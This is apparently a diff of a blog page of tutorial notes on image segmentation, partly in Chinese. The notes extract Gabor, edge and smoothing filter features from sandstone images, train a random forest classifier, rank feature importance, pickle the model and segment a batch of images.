                      gabor_label = 'Gabor ' + str(num)
                      kernel = cv2.getGaborKernel((5, 5), sigma, theta, lamda, gamma, 0, ktype=cv2.CV_32F)
                      fimg = cv2.filter2D(img, cv2.CV_8UC3, kernel)
                      filtered_img = fimg.reshape(-1)
                      df[gabor_label] = filtered_img
                      num += 1
                      -
                      df.head()
                      +
                      1
                      2
                      3
                      4
                      5
                      6
                      7
                      8
                      9
                      10
                      11
                      12
                      num = 1
                      for sigma in (3, 5):
                      for theta in range(2):
                      theta = theta / 4. * np.pi
                      for lamda in np.arange(0, np.pi, np.pi / 4.):
                      for gamma in (0.05, 0.5):
                      gabor_label = 'Gabor ' + str(num)
                      kernel = cv2.getGaborKernel((5, 5), sigma, theta, lamda, gamma, 0, ktype=cv2.CV_32F)
                      fimg = cv2.filter2D(img, cv2.CV_8UC3, kernel)
                      filtered_img = fimg.reshape(-1)
                      df[gabor_label] = filtered_img
                      num += 1
                      +
                      1
                      df.head()
                      @@ -905,20 +903,20 @@

                      df.to_csv('Gabor.csv')
                      +
                      1
                      df.to_csv('Gabor.csv')

                      png

                      62 - Image Segmentation using traditional machine learning - The plan

                      ​ 讲了下后面几篇视频要干啥。

                      63 - Image Segmentation using traditional machine learning Part1 - FeatureExtraction

                      -
                      import numpy as np
                      import cv2
                      import pandas as pd
                      import matplotlib.pyplot as plt

                      img = cv2.imread('images/Train_images/Sandstone_Versa0000.tif', 0)
                      plt.imshow(img, cmap='gray')
                      +
                      1
                      2
                      3
                      4
                      5
                      6
                      7
                      import numpy as np
                      import cv2
                      import pandas as pd
                      import matplotlib.pyplot as plt

                      img = cv2.imread('images/Train_images/Sandstone_Versa0000.tif', 0)
                      plt.imshow(img, cmap='gray')
                      <matplotlib.image.AxesImage at 0x17d0c13f730>
                       

                      png

                      -
                      df = pd.DataFrame()
                      +
                      1
                      df = pd.DataFrame()
                      • Add original pixel values to the data frame as feature #1
                      -
                      img2 = img.reshape(-1)
                      df['Original Image'] = img2
                      df.head()
                      +
                      1
                      2
                      3
                      img2 = img.reshape(-1)
                      df['Original Image'] = img2
                      df.head()
                      @@ -957,7 +955,7 @@

                      # Generate Gabor features
                      num = 1 # To count numbers up in order to give Gabor features a lable in the data frame
                      kernels = []
                      for theta in range(2): # Define number of thetas
                      theta = theta / 4. * np.pi
                      for sigma in (1, 3): # Sigma with 1 and 3
                      for lamda in np.arange(0, np.pi, np.pi / 4): # Range of wavelengths
                      for gamma in (0.05, 0.5): # Gamma values of 0.05 and 0.5
                      gabor_label = 'Gabor' + str(num) # Label Gabor columns as Gabor1, Gabor2, etc.
                      ksize = 9
                      kernel = cv2.getGaborKernel((ksize, ksize), sigma, theta, lamda, gamma, 0, ktype=cv2.CV_32F)
                      kernels.append(kernel)
                      # Now filter the image and add values to a new column
                      fimg = cv2.filter2D(img2, cv2.CV_8UC3, kernel)
                      filtered_img = fimg.reshape(-1)
                      df[gabor_label] = filtered_img # Labels columns as Gabor1, Gabor2, etc.
                      print(gabor_label, ': theta =', theta, ': sigma =', sigma, ': lamda =', lamda, ': gamma =', gamma)
                      num += 1 # Increment for gabor column label
                      +
                      1
                      2
                      3
                      4
                      5
                      6
                      7
                      8
                      9
                      10
                      11
                      12
                      13
                      14
                      15
                      16
                      17
                      18
                      # Generate Gabor features
                      num = 1 # To count numbers up in order to give Gabor features a lable in the data frame
                      kernels = []
                      for theta in range(2): # Define number of thetas
                      theta = theta / 4. * np.pi
                      for sigma in (1, 3): # Sigma with 1 and 3
                      for lamda in np.arange(0, np.pi, np.pi / 4): # Range of wavelengths
                      for gamma in (0.05, 0.5): # Gamma values of 0.05 and 0.5
                      gabor_label = 'Gabor' + str(num) # Label Gabor columns as Gabor1, Gabor2, etc.
                      ksize = 9
                      kernel = cv2.getGaborKernel((ksize, ksize), sigma, theta, lamda, gamma, 0, ktype=cv2.CV_32F)
                      kernels.append(kernel)
                      # Now filter the image and add values to a new column
                      fimg = cv2.filter2D(img2, cv2.CV_8UC3, kernel)
                      filtered_img = fimg.reshape(-1)
                      df[gabor_label] = filtered_img # Labels columns as Gabor1, Gabor2, etc.
                      print(gabor_label, ': theta =', theta, ': sigma =', sigma, ': lamda =', lamda, ': gamma =', gamma)
                      num += 1 # Increment for gabor column label
                      Gabor1 : theta = 0.0 : sigma = 1 : lamda = 0.0 : gamma = 0.05
                       Gabor2 : theta = 0.0 : sigma = 1 : lamda = 0.0 : gamma = 0.5
                       Gabor3 : theta = 0.0 : sigma = 1 : lamda = 0.7853981633974483 : gamma = 0.05
                      @@ -999,41 +997,41 @@ 

                      edges = cv2.Canny(img, 100, 200)
                      edges1 = edges.reshape(-1)
                      df['Canny Edge'] = edges1
                      +
                      1
                      2
                      3
                      edges = cv2.Canny(img, 100, 200)
                      edges1 = edges.reshape(-1)
                      df['Canny Edge'] = edges1
                      • ROBERTS EDGE
                      -
                      from skimage.filters import roberts, sobel, scharr, prewitt

                      edge_roberts = roberts(img)
                      edge_roberts1 = edge_roberts.reshape(-1)
                      df['Roberts'] = edge_roberts1
                      +
                      1
                      2
                      3
                      4
                      5
                      from skimage.filters import roberts, sobel, scharr, prewitt

                      edge_roberts = roberts(img)
                      edge_roberts1 = edge_roberts.reshape(-1)
                      df['Roberts'] = edge_roberts1
                      • SOBEL
                      -
                      edge_sobel = sobel(img)
                      edge_sobel1 = edge_sobel.reshape(-1)
                      df['Sobel'] = edge_sobel1
                      +
                      1
                      2
                      3
                      edge_sobel = sobel(img)
                      edge_sobel1 = edge_sobel.reshape(-1)
                      df['Sobel'] = edge_sobel1
                      • SCHARR
                      -
                      edge_scharr = scharr(img)
                      edge_scharr1 = edge_scharr.reshape(-1)
                      df['Scharr'] = edge_scharr1
                      +
                      1
                      2
                      3
                      edge_scharr = scharr(img)
                      edge_scharr1 = edge_scharr.reshape(-1)
                      df['Scharr'] = edge_scharr1
                      • PREWITT
                      -
                      edge_prewitt = prewitt(img)
                      edge_prewitt1 = edge_prewitt.reshape(-1)
                      df['Prewitt'] = edge_prewitt1
                      +
                      1
                      2
                      3
                      edge_prewitt = prewitt(img)
                      edge_prewitt1 = edge_prewitt.reshape(-1)
                      df['Prewitt'] = edge_prewitt1
                      • GAUSSIAN with sigma = 3
                      -
                      from scipy import ndimage as nd

                      gaussian_img = nd.gaussian_filter(img, sigma=3)
                      gaussian_img1 = gaussian_img.reshape(-1)
                      df['Gaussian s3'] = gaussian_img1
                      +
                      1
                      2
                      3
                      4
                      5
                      from scipy import ndimage as nd

                      gaussian_img = nd.gaussian_filter(img, sigma=3)
                      gaussian_img1 = gaussian_img.reshape(-1)
                      df['Gaussian s3'] = gaussian_img1
                      • GAUSSIAN with sigma = 7
                      -
                      gaussian_img2 = nd.gaussian_filter(img, sigma=7)
                      gaussian_img3 = gaussian_img2.reshape(-1)
                      df['Gaussian s7'] = gaussian_img3
                      +
                      1
                      2
                      3
                      gaussian_img2 = nd.gaussian_filter(img, sigma=7)
                      gaussian_img3 = gaussian_img2.reshape(-1)
                      df['Gaussian s7'] = gaussian_img3
                      • MEDIAN with sigma = 3
                      -
                      median_img = nd.median_filter(img, size=3)
                      median_img1 = median_img.reshape(-1)
                      df['Median s3'] = median_img1
                      +
                      1
                      2
                      3
                      median_img = nd.median_filter(img, size=3)
                      median_img1 = median_img.reshape(-1)
                      df['Median s3'] = median_img1
                      • VARIANCE with size = 3
                      -
                      variance_img = nd.generic_filter(img, np.var, size=3)
                      variance_img1 = variance_img.reshape(-1)
                      df['Variance s3'] = variance_img1 # Add column to original dataframe
                      +
                      1
                      2
                      3
                      variance_img = nd.generic_filter(img, np.var, size=3)
                      variance_img1 = variance_img.reshape(-1)
                      df['Variance s3'] = variance_img1 # Add column to original dataframe

                      -
                      df.head()
                      +
                      1
                      df.head()
                      @@ -1186,27 +1184,27 @@

                      labeled_img = cv2.imread('images/Train_masks/Sandstone_Versa0000.tif', 0)
                      labeled_img1 = labeled_img.reshape(-1)
                      df['Label'] = labeled_img1
                      +
                      1
                      2
                      3
                      labeled_img = cv2.imread('images/Train_masks/Sandstone_Versa0000.tif', 0)
                      labeled_img1 = labeled_img.reshape(-1)
                      df['Label'] = labeled_img1

                      64 - Image Segmentation using traditional machine learning - Part2 Training RF

                      • Dependent variable
                      -
                      Y = df['Label'].values
                      X = df.drop(labels=['Label'], axis=1)
                      +
                      1
                      2
                      Y = df['Label'].values
                      X = df.drop(labels=['Label'], axis=1)
                      • Split data into test and train
                      -
                      from sklearn.model_selection import train_test_split

                      X_train, X_test, Y_train, Y_test = train_test_split(X, Y, test_size=0.4, random_state=20)
                      +
                      1
                      2
                      3
                      from sklearn.model_selection import train_test_split

                      X_train, X_test, Y_train, Y_test = train_test_split(X, Y, test_size=0.4, random_state=20)
                      • Import ML algorithm and train the model
                      -
                      from sklearn.ensemble import RandomForestClassifier

                      model = RandomForestClassifier(n_estimators=10, random_state=42)
                      model.fit(X_train, Y_train)
                      prediction_test = model.predict(X_test)
                      -
                      from sklearn import metrics

                      print("Accuracy =", metrics.accuracy_score(Y_test, prediction_test))
                      +
                      1
                      2
                      3
                      4
                      5
                      from sklearn.ensemble import RandomForestClassifier

                      model = RandomForestClassifier(n_estimators=10, random_state=42)
                      model.fit(X_train, Y_train)
                      prediction_test = model.predict(X_test)
                      +
                      1
                      2
                      3
                      from sklearn import metrics

                      print("Accuracy =", metrics.accuracy_score(Y_test, prediction_test))
                      Accuracy = 0.9812850216441728
                       

                      65 - Image Segmentation using traditional machine learning - Part3 Feature Ranking

                      -
                      fig = plt.figure(figsize=(12, 16))
                      p = 1
                      for index, feature in enumerate(df.columns):
                      if index == 0:
                      p += 1
                      ax = fig.add_subplot(181)
                      plt.xticks([])
                      plt.yticks([])
                      ax.imshow(img, cmap='gray')
                      ax.title.set_text(feature)
                      else:
                      if p % 8 == 1:
                      p += 1
                      exec("ax" + str(index) + "=fig.add_subplot(6, 8, " + str(p) + ")")
                      plt.xticks([])
                      plt.yticks([])
                      exec("ax" + str(index) + ".imshow(np.array(df[feature]).reshape(img.shape), cmap='gray')")
                      exec("ax" + str(index) + ".title.set_text('" + feature + "')")
                      p += 1
                      plt.show()
                      +
                      1
                      2
                      3
                      4
                      5
                      6
                      7
                      8
                      9
                      10
                      11
                      12
                      13
                      14
                      15
                      16
                      17
                      18
                      19
                      20
                      fig = plt.figure(figsize=(12, 16))
                      p = 1
                      for index, feature in enumerate(df.columns):
                      if index == 0:
                      p += 1
                      ax = fig.add_subplot(181)
                      plt.xticks([])
                      plt.yticks([])
                      ax.imshow(img, cmap='gray')
                      ax.title.set_text(feature)
                      else:
                      if p % 8 == 1:
                      p += 1
                      exec("ax" + str(index) + "=fig.add_subplot(6, 8, " + str(p) + ")")
                      plt.xticks([])
                      plt.yticks([])
                      exec("ax" + str(index) + ".imshow(np.array(df[feature]).reshape(img.shape), cmap='gray')")
                      exec("ax" + str(index) + ".title.set_text('" + feature + "')")
                      p += 1
                      plt.show()

                      png

                      -
                      importances = list(model.feature_importances_)
                      features_list = list(X.columns)
                      feature_imp = pd.Series(model.feature_importances_, index=features_list).sort_values(ascending=False)
                      feature_imp
                      +
                      1
                      2
                      3
                      4
                      importances = list(model.feature_importances_)
                      features_list = list(X.columns)
                      feature_imp = pd.Series(model.feature_importances_, index=features_list).sort_values(ascending=False)
                      feature_imp
                      Gabor4            0.248493
                       Gaussian s3       0.168623
                       Median s3         0.122685
                      @@ -1252,46 +1250,46 @@ 

                      66 - Image Segmentation using traditional machine learning - Part4 Pickling Model

                      -
                      import pickle

                      filename = 'sandstone_model'
                      pickle.dump(model, open(filename, 'wb'))

                      load_model = pickle.load(open(filename, 'rb'))
                      result = load_model.predict(X)

                      segmented = result.reshape((img.shape))
                      -
                      import matplotlib.pyplot as plt

                      plt.imshow(segmented, cmap='jet')
                      +
                      1
                      2
                      3
                      4
                      5
                      6
                      7
                      8
                      9
                      import pickle

                      filename = 'sandstone_model'
                      pickle.dump(model, open(filename, 'wb'))

                      load_model = pickle.load(open(filename, 'rb'))
                      result = load_model.predict(X)

                      segmented = result.reshape((img.shape))
                      +
                      1
                      2
                      3
                      import matplotlib.pyplot as plt

                      plt.imshow(segmented, cmap='jet')
                      <matplotlib.image.AxesImage at 0x17d37062220>
                       

                      png

                      -
                      plt.imsave('segmented_rock.jpg', segmented, cmap='jet')
                      +
                      1
                      plt.imsave('segmented_rock.jpg', segmented, cmap='jet')

                      67 - Image Segmentation using traditional machine learning - Part5 Segmenting Images

                      -
                      import numpy as np
                      import cv2
                      import pandas as pd

                      def feature_extraction(img):
                      df = pd.DataFrame()


                      # All features generated must match the way features are generated for TRAINING.
                      # Feature1 is our original image pixels
                      img2 = img.reshape(-1)
                      df['Original Image'] = img2

                      # Generate Gabor features
                      num = 1
                      kernels = []
                      for theta in range(2):
                      theta = theta / 4. * np.pi
                      for sigma in (1, 3):
                      for lamda in np.arange(0, np.pi, np.pi / 4):
                      for gamma in (0.05, 0.5):
                      gabor_label = 'Gabor' + str(num)
                      ksize=9
                      kernel = cv2.getGaborKernel((ksize, ksize), sigma, theta, lamda, gamma, 0, ktype=cv2.CV_32F)
                      kernels.append(kernel)
                      # Now filter image and add values to new column
                      fimg = cv2.filter2D(img2, cv2.CV_8UC3, kernel)
                      filtered_img = fimg.reshape(-1)
                      df[gabor_label] = filtered_img # Modify this to add new column for each gabor
                      num += 1
                      ########################################
                      # Geerate OTHER FEATURES and add them to the data frame
                      # Feature 3 is canny edge
                      edges = cv2.Canny(img, 100,200) # Image, min and max values
                      edges1 = edges.reshape(-1)
                      df['Canny Edge'] = edges1 # Add column to original dataframe

                      from skimage.filters import roberts, sobel, scharr, prewitt

                      # Feature 4 is Roberts edge
                      edge_roberts = roberts(img)
                      edge_roberts1 = edge_roberts.reshape(-1)
                      df['Roberts'] = edge_roberts1

                      # Feature 5 is Sobel
                      edge_sobel = sobel(img)
                      edge_sobel1 = edge_sobel.reshape(-1)
                      df['Sobel'] = edge_sobel1

                      # Feature 6 is Scharr
                      edge_scharr = scharr(img)
                      edge_scharr1 = edge_scharr.reshape(-1)
                      df['Scharr'] = edge_scharr1

                      # Feature 7 is Prewitt
                      edge_prewitt = prewitt(img)
                      edge_prewitt1 = edge_prewitt.reshape(-1)
                      df['Prewitt'] = edge_prewitt1

                      # Feature 8 is Gaussian with sigma=3
                      from scipy import ndimage as nd
                      gaussian_img = nd.gaussian_filter(img, sigma=3)
                      gaussian_img1 = gaussian_img.reshape(-1)
                      df['Gaussian s3'] = gaussian_img1

                      # Feature 9 is Gaussian with sigma=7
                      gaussian_img2 = nd.gaussian_filter(img, sigma=7)
                      gaussian_img3 = gaussian_img2.reshape(-1)
                      df['Gaussian s7'] = gaussian_img3

                      # Feature 10 is Median with sigma=3
                      median_img = nd.median_filter(img, size=3)
                      median_img1 = median_img.reshape(-1)
                      df['Median s3'] = median_img1

                      # Feature 11 is Variance with size=3
                      variance_img = nd.generic_filter(img, np.var, size=3)
                      variance_img1 = variance_img.reshape(-1)
                      df['Variance s3'] = variance_img1 # Add column to original dataframe

                      return df
                      -
                      import glob
                      import pickle
                      from matplotlib import pyplot as plt

                      filename = "sandstone_model"
                      loaded_model = pickle.load(open(filename, 'rb'))

                      path = "images/Train_images/*.tif"
                      for file in glob.glob(path):
                      print(file) # just stop here to see all file names printed
                      img = cv2.imread(file, 0)
                      # Call the feature extraction function.
                      X = feature_extraction(img)
                      result = loaded_model.predict(X)
                      segmented = result.reshape((img.shape))

                      name = file.split("e_")
                      cv2.imwrite('images/Segmented/'+ name[1], segmented)
                      +
                      1
                      2
                      3
                      4
                      5
                      6
                      7
                      8
                      9
                      10
                      11
                      12
                      13
                      14
                      15
                      16
                      17
                      18
                      19
                      20
                      21
                      22
                      23
                      24
                      25
                      26
                      27
                      28
                      29
                      30
                      31
                      32
                      33
                      34
                      35
                      36
                      37
                      38
                      39
                      40
                      41
                      42
                      43
                      44
                      45
                      46
                      47
                      48
                      49
                      50
                      51
                      52
                      53
                      54
                      55
                      56
                      57
                      58
                      59
                      60
                      61
                      62
                      63
                      64
                      65
                      66
                      67
                      68
                      69
                      70
                      71
                      72
                      73
                      74
                      75
                      76
                      77
                      78
                      79
                      80
                      81
                      import numpy as np
                      import cv2
                      import pandas as pd

                      def feature_extraction(img):
                      df = pd.DataFrame()


                      # All features generated must match the way features are generated for TRAINING.
                      # Feature1 is our original image pixels
                      img2 = img.reshape(-1)
                      df['Original Image'] = img2

                      # Generate Gabor features
                      num = 1
                      kernels = []
                      for theta in range(2):
                      theta = theta / 4. * np.pi
                      for sigma in (1, 3):
                      for lamda in np.arange(0, np.pi, np.pi / 4):
                      for gamma in (0.05, 0.5):
                      gabor_label = 'Gabor' + str(num)
                      ksize=9
                      kernel = cv2.getGaborKernel((ksize, ksize), sigma, theta, lamda, gamma, 0, ktype=cv2.CV_32F)
                      kernels.append(kernel)
                      # Now filter image and add values to new column
                      fimg = cv2.filter2D(img2, cv2.CV_8UC3, kernel)
                      filtered_img = fimg.reshape(-1)
                      df[gabor_label] = filtered_img # Modify this to add new column for each gabor
                      num += 1
                      ########################################
                      # Geerate OTHER FEATURES and add them to the data frame
                      # Feature 3 is canny edge
                      edges = cv2.Canny(img, 100,200) # Image, min and max values
                      edges1 = edges.reshape(-1)
                      df['Canny Edge'] = edges1 # Add column to original dataframe

                      from skimage.filters import roberts, sobel, scharr, prewitt

                      # Feature 4 is Roberts edge
                      edge_roberts = roberts(img)
                      edge_roberts1 = edge_roberts.reshape(-1)
                      df['Roberts'] = edge_roberts1

                      # Feature 5 is Sobel
                      edge_sobel = sobel(img)
                      edge_sobel1 = edge_sobel.reshape(-1)
                      df['Sobel'] = edge_sobel1

                      # Feature 6 is Scharr
                      edge_scharr = scharr(img)
                      edge_scharr1 = edge_scharr.reshape(-1)
                      df['Scharr'] = edge_scharr1

                      # Feature 7 is Prewitt
                      edge_prewitt = prewitt(img)
                      edge_prewitt1 = edge_prewitt.reshape(-1)
                      df['Prewitt'] = edge_prewitt1

                      # Feature 8 is Gaussian with sigma=3
                      from scipy import ndimage as nd
                      gaussian_img = nd.gaussian_filter(img, sigma=3)
                      gaussian_img1 = gaussian_img.reshape(-1)
                      df['Gaussian s3'] = gaussian_img1

                      # Feature 9 is Gaussian with sigma=7
                      gaussian_img2 = nd.gaussian_filter(img, sigma=7)
                      gaussian_img3 = gaussian_img2.reshape(-1)
                      df['Gaussian s7'] = gaussian_img3

                      # Feature 10 is Median with sigma=3
                      median_img = nd.median_filter(img, size=3)
                      median_img1 = median_img.reshape(-1)
                      df['Median s3'] = median_img1

                      # Feature 11 is Variance with size=3
                      variance_img = nd.generic_filter(img, np.var, size=3)
                      variance_img1 = variance_img.reshape(-1)
                      df['Variance s3'] = variance_img1 # Add column to original dataframe

                      return df
                      +
                      1
                      2
                      3
                      4
                      5
                      6
                      7
                      8
                      9
                      10
                      11
                      12
                      13
                      14
                      15
                      16
                      17
                      18
                      import glob
                      import pickle
                      from matplotlib import pyplot as plt

                      filename = "sandstone_model"
                      loaded_model = pickle.load(open(filename, 'rb'))

                      path = "images/Train_images/*.tif"
                      for file in glob.glob(path):
                      print(file) # just stop here to see all file names printed
                      img = cv2.imread(file, 0)
                      # Call the feature extraction function.
                      X = feature_extraction(img)
                      result = loaded_model.predict(X)
                      segmented = result.reshape((img.shape))

                      name = file.split("e_")
                      cv2.imwrite('images/Segmented/'+ name[1], segmented)

                      jpg

                      67b - Feature based image segmentation using traditional machine learning. -Multi-training images-

                      总结通过传统机器学习方法进行图像分类的各个步骤。

                      使用随机森林或支持向量机,这是传统的机器学习方法之一,我相信这比深度学习方法要好得多,因为对于大多数应用程序来说,您通常没有深度学习所需的数据类型,因此传统机器学习有时效果很好,如果您没有大量训练数据,实际上有时比深度学习好得多。

                      -
                      import numpy as np
                      import cv2
                      import pandas as pd
                      import pickle
                      from matplotlib import pyplot as plt
                      import os
                      +
                      1
                      2
                      3
                      4
                      5
                      6
                      import numpy as np
                      import cv2
                      import pandas as pd
                      import pickle
                      from matplotlib import pyplot as plt
                      import os
                      • STEP 1: READ TRAINING IMAGES AND EXTRACT FEATURES
                      -
                      image_dataset = pd.DataFrame()  # Dataframe to capture image features

                      img_path = "images/train_images/"
                      for image in os.listdir(img_path): # iterate through each file
                      print(image)

                      df = pd.DataFrame() # Temporary data frame to capture information for each loop.
                      # Reset dataframe to blank after each loop.

                      input_img = cv2.imread(img_path + image) # Read images

                      # Check if the input image is RGB or grey and convert to grey if RGB
                      if input_img.ndim == 3 and input_img.shape[-1] == 3:
                      img = cv2.cvtColor(input_img,cv2.COLOR_BGR2GRAY)
                      elif input_img.ndim == 2:
                      img = input_img
                      else:
                      raise excerption("The module works only with grayscale and RGB images!")

                      ################################################################
                      # START ADDING DATA TO THE DATAFRAME

                      # Add pixel values to the data frame
                      pixel_values = img.reshape(-1)
                      df['Pixel_Value'] = pixel_values # Pixel value itself as a feature
                      df['Image_Name'] = image # Capture image name as we read multiple images

                      ############################################################################
                      # Generate Gabor features
                      num = 1 # To count numbers up in order to give Gabor features a lable in the data frame
                      kernels = []
                      for theta in range(2): # Define number of thetas
                      theta = theta / 4. * np.pi
                      for sigma in (1, 3): # Sigma with 1 and 3
                      for lamda in np.arange(0, np.pi, np.pi / 4): # Range of wavelengths
                      for gamma in (0.05, 0.5): # Gamma values of 0.05 and 0.5
                      gabor_label = 'Gabor' + str(num) # Label Gabor columns as Gabor1, Gabor2, etc.
                      ksize=9
                      kernel = cv2.getGaborKernel((ksize, ksize), sigma, theta, lamda, gamma, 0, ktype=cv2.CV_32F)
                      kernels.append(kernel)
                      # Now filter the image and add values to a new column
                      fimg = cv2.filter2D(img, cv2.CV_8UC3, kernel)
                      filtered_img = fimg.reshape(-1)
                      df[gabor_label] = filtered_img #Labels columns as Gabor1, Gabor2, etc.
                      print(gabor_label, ': theta=', theta, ': sigma=', sigma, ': lamda=', lamda, ': gamma=', gamma)
                      num += 1 # Increment for gabor column label
                      ########################################
                      # Gerate OTHER FEATURES and add them to the data frame

                      # CANNY EDGE
                      edges = cv2.Canny(img, 100,200) #Image, min and max values
                      edges1 = edges.reshape(-1)
                      df['Canny Edge'] = edges1 #Add column to original dataframe

                      from skimage.filters import roberts, sobel, scharr, prewitt

                      # ROBERTS EDGE
                      edge_roberts = roberts(img)
                      edge_roberts1 = edge_roberts.reshape(-1)
                      df['Roberts'] = edge_roberts1

                      # SOBEL
                      edge_sobel = sobel(img)
                      edge_sobel1 = edge_sobel.reshape(-1)
                      df['Sobel'] = edge_sobel1

                      # SCHARR
                      edge_scharr = scharr(img)
                      edge_scharr1 = edge_scharr.reshape(-1)
                      df['Scharr'] = edge_scharr1

                      # PREWITT
                      edge_prewitt = prewitt(img)
                      edge_prewitt1 = edge_prewitt.reshape(-1)
                      df['Prewitt'] = edge_prewitt1

                      # GAUSSIAN with sigma=3
                      from scipy import ndimage as nd
                      gaussian_img = nd.gaussian_filter(img, sigma=3)
                      gaussian_img1 = gaussian_img.reshape(-1)
                      df['Gaussian s3'] = gaussian_img1

                      # GAUSSIAN with sigma=7
                      gaussian_img2 = nd.gaussian_filter(img, sigma=7)
                      gaussian_img3 = gaussian_img2.reshape(-1)
                      df['Gaussian s7'] = gaussian_img3

                      # MEDIAN with sigma=3
                      median_img = nd.median_filter(img, size=3)
                      median_img1 = median_img.reshape(-1)
                      df['Median s3'] = median_img1

                      # VARIANCE with size=3
                      variance_img = nd.generic_filter(img, np.var, size=3)
                      variance_img1 = variance_img.reshape(-1)
                      df['Variance s3'] = variance_img1 # Add column to original dataframe

                      ######################################
                      # Update dataframe for images to include details for each image in the loop
                      image_dataset = image_dataset.append(df)
                      +
                      1
                      2
                      3
                      4
                      5
                      6
                      7
                      8
                      9
                      10
                      11
                      12
                      13
                      14
                      15
                      16
                      17
                      18
                      19
                      20
                      21
                      22
                      23
                      24
                      25
                      26
                      27
                      28
                      29
                      30
                      31
                      32
                      33
                      34
                      35
                      36
                      37
                      38
                      39
                      40
                      41
                      42
                      43
                      44
                      45
                      46
                      47
                      48
                      49
                      50
                      51
                      52
                      53
                      54
                      55
                      56
                      57
                      58
                      59
                      60
                      61
                      62
                      63
                      64
                      65
                      66
                      67
                      68
                      69
                      70
                      71
                      72
                      73
                      74
                      75
                      76
                      77
                      78
                      79
                      80
                      81
                      82
                      83
                      84
                      85
                      86
                      87
                      88
                      89
                      90
                      91
                      92
                      93
                      94
                      95
                      96
                      97
                      98
                      99
                      100
                      image_dataset = pd.DataFrame()  # Dataframe to capture image features

                      img_path = "images/train_images/"
                      for image in os.listdir(img_path): # iterate through each file
                      print(image)

                      df = pd.DataFrame() # Temporary data frame to capture information for each loop.
                      # Reset dataframe to blank after each loop.

                      input_img = cv2.imread(img_path + image) # Read images

                      # Check if the input image is RGB or grey and convert to grey if RGB
                      if input_img.ndim == 3 and input_img.shape[-1] == 3:
                      img = cv2.cvtColor(input_img,cv2.COLOR_BGR2GRAY)
                      elif input_img.ndim == 2:
                      img = input_img
                      else:
                      raise excerption("The module works only with grayscale and RGB images!")

                      ################################################################
                      # START ADDING DATA TO THE DATAFRAME

                      # Add pixel values to the data frame
                      pixel_values = img.reshape(-1)
                      df['Pixel_Value'] = pixel_values # Pixel value itself as a feature
                      df['Image_Name'] = image # Capture image name as we read multiple images

                      ############################################################################
                      # Generate Gabor features
                      num = 1 # To count numbers up in order to give Gabor features a lable in the data frame
                      kernels = []
                      for theta in range(2): # Define number of thetas
                      theta = theta / 4. * np.pi
                      for sigma in (1, 3): # Sigma with 1 and 3
                      for lamda in np.arange(0, np.pi, np.pi / 4): # Range of wavelengths
                      for gamma in (0.05, 0.5): # Gamma values of 0.05 and 0.5
                      gabor_label = 'Gabor' + str(num) # Label Gabor columns as Gabor1, Gabor2, etc.
                      ksize=9
                      kernel = cv2.getGaborKernel((ksize, ksize), sigma, theta, lamda, gamma, 0, ktype=cv2.CV_32F)
                      kernels.append(kernel)
                      # Now filter the image and add values to a new column
                      fimg = cv2.filter2D(img, cv2.CV_8UC3, kernel)
                      filtered_img = fimg.reshape(-1)
                      df[gabor_label] = filtered_img #Labels columns as Gabor1, Gabor2, etc.
                      print(gabor_label, ': theta=', theta, ': sigma=', sigma, ': lamda=', lamda, ': gamma=', gamma)
                      num += 1 # Increment for gabor column label
                      ########################################
                      # Gerate OTHER FEATURES and add them to the data frame

                      # CANNY EDGE
                      edges = cv2.Canny(img, 100,200) #Image, min and max values
                      edges1 = edges.reshape(-1)
                      df['Canny Edge'] = edges1 #Add column to original dataframe

                      from skimage.filters import roberts, sobel, scharr, prewitt

                      # ROBERTS EDGE
                      edge_roberts = roberts(img)
                      edge_roberts1 = edge_roberts.reshape(-1)
                      df['Roberts'] = edge_roberts1

                      # SOBEL
                      edge_sobel = sobel(img)
                      edge_sobel1 = edge_sobel.reshape(-1)
                      df['Sobel'] = edge_sobel1

                      # SCHARR
                      edge_scharr = scharr(img)
                      edge_scharr1 = edge_scharr.reshape(-1)
                      df['Scharr'] = edge_scharr1

                      # PREWITT
                      edge_prewitt = prewitt(img)
                      edge_prewitt1 = edge_prewitt.reshape(-1)
                      df['Prewitt'] = edge_prewitt1

                      # GAUSSIAN with sigma=3
                      from scipy import ndimage as nd
                      gaussian_img = nd.gaussian_filter(img, sigma=3)
                      gaussian_img1 = gaussian_img.reshape(-1)
                      df['Gaussian s3'] = gaussian_img1

                      # GAUSSIAN with sigma=7
                      gaussian_img2 = nd.gaussian_filter(img, sigma=7)
                      gaussian_img3 = gaussian_img2.reshape(-1)
                      df['Gaussian s7'] = gaussian_img3

                      # MEDIAN with sigma=3
                      median_img = nd.median_filter(img, size=3)
                      median_img1 = median_img.reshape(-1)
                      df['Median s3'] = median_img1

                      # VARIANCE with size=3
                      variance_img = nd.generic_filter(img, np.var, size=3)
                      variance_img1 = variance_img.reshape(-1)
                      df['Variance s3'] = variance_img1 # Add column to original dataframe

                      ######################################
                      # Update dataframe for images to include details for each image in the loop
                      image_dataset = image_dataset.append(df)
                      • STEP 2: READ LABELED IMAGES (MASKS) AND CREATE ANOTHER DATAFRAME WITH LABEL VALUES AND LABEL FILE NAMES
                      -
                      mask_dataset = pd.DataFrame()  # Create dataframe to capture mask info.

                      mask_path = "images/train_masks/"
                      for mask in os.listdir(mask_path): # iterate through each file to perform some action
                      print(mask)

                      df2 = pd.DataFrame() # Temporary dataframe to capture info for each mask in the loop
                      input_mask = cv2.imread(mask_path + mask)

                      # Check if the input mask is RGB or grey and convert to grey if RGB
                      if input_mask.ndim == 3 and input_mask.shape[-1] == 3:
                      label = cv2.cvtColor(input_mask,cv2.COLOR_BGR2GRAY)
                      elif input_mask.ndim == 2:
                      label = input_mask
                      else:
                      raise excerption("The module works only with grayscale and RGB images!")

                      # Add pixel values to the data frame
                      label_values = label.reshape(-1)
                      df2['Label_Value'] = label_values
                      df2['Mask_Name'] = mask

                      mask_dataset = mask_dataset.append(df2) # Update mask dataframe with all the info from each mask
                      +
                      1
                      2
                      3
                      4
                      5
                      6
                      7
                      8
                      9
                      10
                      11
                      12
                      13
                      14
                      15
                      16
                      17
                      18
                      19
                      20
                      21
                      22
                      23
                      mask_dataset = pd.DataFrame()  # Create dataframe to capture mask info.

                      mask_path = "images/train_masks/"
                      for mask in os.listdir(mask_path): # iterate through each file to perform some action
                      print(mask)

                      df2 = pd.DataFrame() # Temporary dataframe to capture info for each mask in the loop
                      input_mask = cv2.imread(mask_path + mask)

                      # Check if the input mask is RGB or grey and convert to grey if RGB
                      if input_mask.ndim == 3 and input_mask.shape[-1] == 3:
                      label = cv2.cvtColor(input_mask,cv2.COLOR_BGR2GRAY)
                      elif input_mask.ndim == 2:
                      label = input_mask
                      else:
                      raise excerption("The module works only with grayscale and RGB images!")

